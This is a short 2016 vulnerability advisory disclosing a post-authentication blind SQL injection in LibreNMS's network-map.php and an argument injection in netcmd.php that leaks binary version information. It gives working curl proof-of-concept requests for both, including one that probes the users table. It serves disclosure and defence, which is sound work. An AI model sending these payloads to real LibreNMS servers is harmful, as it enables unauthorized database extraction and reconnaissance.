JAHx162 - LibreNMS post auth SQL injection and information disclosure

Posted by Eldar Marcussen on Tue Sep 13 07:17:38 EDT 2016

These vulnerabilities were discovered by Eldar "Wireghoul" Marcussen

About

LibreNMS, a fully featured network monitoring system that provides a wealth of features and device support. -- http://www.librenms.org/

Information disclosure

Librenms was using a flawed regular expression to filter input given to commands, this allowed an attacker to specify command line options which can lead to information disclosure. The following examples could be used to check the version numbers of the binaries.

curl 'https://host/netcmd.php?query=--version&cmd=tracert'
curl 'https://host/netcmd.php?query=--version&cmd=whois'
curl 'https://host/netcmd.php?query=--version&cmd=ping'

SQLinjection

The network map script suffers from a blind SQL injection vulnerability, giving a binary condition which can be used to extract data. The following example urls both show two successful attacks:

curl 'https://host/network-map.php?format=svg&device=34+and+1=1'
curl 'https://host/network-map.php?format=svg&device=34+and+(select+count(username)+from+users)=5'

Affected versions

Versions 77e76793c518e504ceacd0cee2157f4260203fce and older


Posted by Eldar Marcussen | Permanent link